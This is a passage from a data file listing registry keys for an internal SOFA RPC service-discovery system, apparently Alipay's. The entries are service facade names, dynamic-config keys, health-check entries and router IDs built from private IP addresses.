SearchQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:gpfnfiveaccount@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofa-demo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydataproc:name=com.alipay.securitydata.common.service.integration.antq.impl.drm.AntQSendResource.crossMsgDiscardZone,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finsnsbff:name=com.alipay.finsnsbff.chair.Config.proxySnapshotMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.113.95#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocommopt.com.service.facade.api.SelfMarketingPromoCampConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.faasset.api.asset.FaAssetTransConfirmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdarttool.device.remote.assist.ControlRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:simpleShopRateCreateExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.feed.service.GlobalFeedManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.QueryChargeInstGeographyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.174.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cifglobal:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yebplus.common.facade.service.api.query.YebsAutoTransferInAmountQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:inscvprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditprod.service.PcreditPidDimAssistFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antscheduler.facade.IConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.bcm.common.service.facade.SecretKeyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.basementweb.ProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair_dest.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.112.128#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.mng.feature.facade.DataReleaseService:1.0:mybank@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.facade.validator.DecisionLogCompareService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.customscenter.biz.declare.drm.CommonConfig.grayCustomsConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfoprod.common.service.ucdp.UcdpAdapFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:changefree_sls@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.common.CacheServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.fc.mif.common.service.facade.org.RealStorePageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.bbcmng.common.service.facade.PromoFundLosePlatformInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accordercore.common.service.facade.control.auth.api.AuthOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.cfmng.biz.shared.manager.impl.EmergencyAdjustDrmResource.fileSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ipsponsorprod.biz.cashback.service.facade.EarnLuckyPointTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.customerTairCache.selfZone,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkfundbuss.common.facade.AccountMaintenanceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.innertrans.facade.api.InnerAccountDailyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:progov_fundSche@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.privatecloud.offer.OfferConsultPriceForPCFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iacquirefrontTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.common.service.facade.risk.RiskDefenseFeedbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.109.192#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.kmi.common.service.facade.PgpKeyManagementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.promomng.core.model.antworkbench.repository.AntApprovalConfigRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.unitestcenter.common.service.facade.api.TestManagementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotationcore.common.service.facade.api.stockcode.FqpQcStockCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundguardian.common.facade.service.GuardianVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.insusercenter.facade.policysearch.api.PolicyStatisticsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.linepay.common.serivce.facade.recon.ReconChannelService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.64.122#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue43#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.acctransquery.common.service.facade.api.SimpleInTransUniqQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.CreateBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:ifxSchedulerExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:mbillexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.func.ExpressionManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.facade.manage.api.ProgramOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-bizRecon#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.cacheLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.iconnect.common.service.facade.api.DeliveryRecommendFacade:1.0:icdpcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-afwrobottwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dss.endpoint.plugin.openapi.ConnectorMonitorOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.acdoccore.common.service.facade.category.SystemParameterFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antmember.common.service.facade.LotteryLogService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.appuser.MerchantAppUserDataImportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.point.facade.PointQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.CommunityUnionBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloantrade.common.service.facade.loan.api.EvOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.manage.facade.api.ParmMntListConfigWrapperFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custview.facade.IdentificationViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.verify.api.SecurityVerifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_aivolvo_scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.holoxmng.content.service.facade.HoloxSampleItemService:1.0:holoxSampleFingerprintService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINFUNDPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.core.service.gray.grayConfigDrmHandler.insureFuseList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.core.migrate.drm.SceneMigrateTaskDrm.extInfoTargetCharset,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.autoinsprod.common.insure.v2.AutoCardConfirmFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:kbmmweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","HEALTHY_V2@fundmng#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.finmatchcore:name=com.alipay.finmatchcore.common.service.facade.client.drm.MatchConfigClientDrm.advancedFlowControlSwitchStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_C_LIFE_ASSIST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insmarketingcore.common.service.facade.point.InsMktPointCoreQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphad.common.service.facade.datamng.api.AdfDataImportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocenter.facade.api.prototype.AppPromoEquityServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkfinconsign.common.service.facade.yeb.YebDataProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echannelcenter.common.service.facade.EchannelInstProfileQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.ServerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@finscprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.baoxiandataproc.common.service.api.InsFileTmplQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.filecore.service.facade.spi.FileAssembleCallBack:1.0:instbill-file-assemble@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acnotifycore.common.service.facade.CategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.30.196.111#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.203.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilechat.biz.outservice.rpc.api.ShareRpcService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmUnfreezeDrmResource.jsonStarWishProcessContext,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clivemng.common.service.facade.api.clvuser.ClvUserQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.84.130#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.38.76.145#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iotcore.admin.CodeGeneratorAdminApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.PrivilegeQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.authcenter.service.facade.AuthenticationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tsm.common.service.facade.rpc.spi.TsmDinService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:printErrorLogHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatacontextLoadTestTBaseCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.148.115#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.26.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publiccore.common.service.facade.app.PublicCustomZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.cert.facade.CertVerifyInfoManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.RiskmngComplainContentConsultCallBack:1.0:mobilechatRisk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.malgo.common.facade.RerankComboFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkMvelBlackKeyWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.biz.workorder.drm.InsWorkorderDRM.workorderCardSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openauth.common.service.facade.selfhelp.AppMultiReturnUrlManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbstaffcenter.common.service.facade.area.AreaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.zdal.ldc.tair.cardbinMdmTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.159.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.zdalproxy.shard_ds_with_rewriteBatchedStatements.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.177.68#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.bkloancommon.common.service.facade.loderealm.api.LodeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:pointndcprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.chargeTBaseCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.paramcore.common.service.manage.facade.api.ParmDomainRelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antdatashow.facade.api.SubscrManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.33.179#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbservcore.common.service.facade.RoleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchasset_qcCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_bkmt_bkcd_isv_signin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_CATERING_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:mdeduct@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.25.169.190#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.finslip.finreconBatchTddlDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.drillcenter.facade.api.RiskSceneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.security.verity.MrmBuRoleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dk.common.service.facade.transfer.D2CustomAlarmMigrationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:oneapi-server@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.taobao.jnpiter.eros.open.api.LaunchService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.insmobile:name=com.alipay.insmobile.core.service.gray.grayConfigDrmHandler.enquiryFuseList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.quotetradecore.common.service.facade.api.FundNetValueFacadeNew:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.common.service.facade.api.onecent.YebcFixedJoinCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.query.FundLabelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileapp.common.service.facade.getconfig.GetSdkConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.analysis.AnalysisPushChangeRecordDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.ext.payment.receipt.api.PaymentReceiptService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.auth.AuthService:1.0:autologin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.TradeCoreSwitchDecisionResource.channelWhiteList,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.chaos.dig.facade.code.antcode.AntCodeApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.creditorsright.CreditorsRightTransferQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.core.service.repository.FintradeOrderRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.246.223#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.aciamcore.common.service.facade.identity.AccessorServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.neardata.query.api.SkuQueryClientService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.96.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditmerchant.service.facade.HBMerchantSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdspcore.common.service.facade.callback.DispositionCallback:1.0:marketrisk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.SavedExpressSendSmsRuleResource.extQUserPayAmountSwitchThresholdStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.agap.service.facade.mng.api.WordBatchTaskMngService:1.0:tcService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_UNIFIEDLIMIT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.184.233#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchprod.common.service.facade.merchant.MrchProdAttachmentMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:publichome_customerTelModifyCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityidentify.service.otp.OtpCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.1.232#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acpmscore.facade.ScheduleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.dwebupload.client.drm.DomainConfig.downloadDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sdaclouddevice.facade.log.DeviceLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.ProductRequirementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.common.service.facade.money.AssetAllowanceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_PAYMENT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.162.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.service.governance.facade.ServiceMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchprod.common.service.facade.merchant.MrchProdMerchantOrderQueryMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cicada.bizide.common.service.facade.api.BizModuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.config.ZcbConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.socialcore.facade.taskcenter.TaskTmpDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.postmen.spi.MessageSpi:1.0:mmtcaftscmdproc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.commandcenter:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.xssClientPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_C_MASTERDATA#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_C_RCACHE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservice.common.service.facade.api.smartcall.SmartcallOriginInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.memberprod.common.service.anttoken.AntAccessTokenService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.aliinvoiceprod.common.service.facade.reimbursement.api.ReimZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finsnsbff:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentlib.common.service.facade.content.ContentGreyDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcalendar.quality.service.facade.api.PatrolUniformServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.dataasset.DataAssetMngSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.product.AbossToFcConditionMapQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.biz.promoworkbench.market.config.ComponentConfig:1.0:lotteryConfig@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.162.140#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gfsettleprod.facade.WriteOffOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.product.ProdSaleQueryStdFacade:1.0:PDCORE_SSCMW1CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.MaintenanceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.financeprod.fund.facade.api.MFundContractQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acauditcenter.facade.OperationTypeFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.lifemng.facade.bizrecon.ReconConfManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcrcportal:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.holoxmng.complain.service.facade.ReportRecordEventService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.biz.platform.task.recoverevent.drm.RecoverAppSceneResource.appSceneList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.DrmForCommonManageResource.whiteAgreementNos,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.msgopprod.common.service.facade.event.EventMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.dataservice.service.RiskTagConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSwitchControlDRMResource.switchSceneList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilechat.common.service.facade.api.ChatGrayConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.124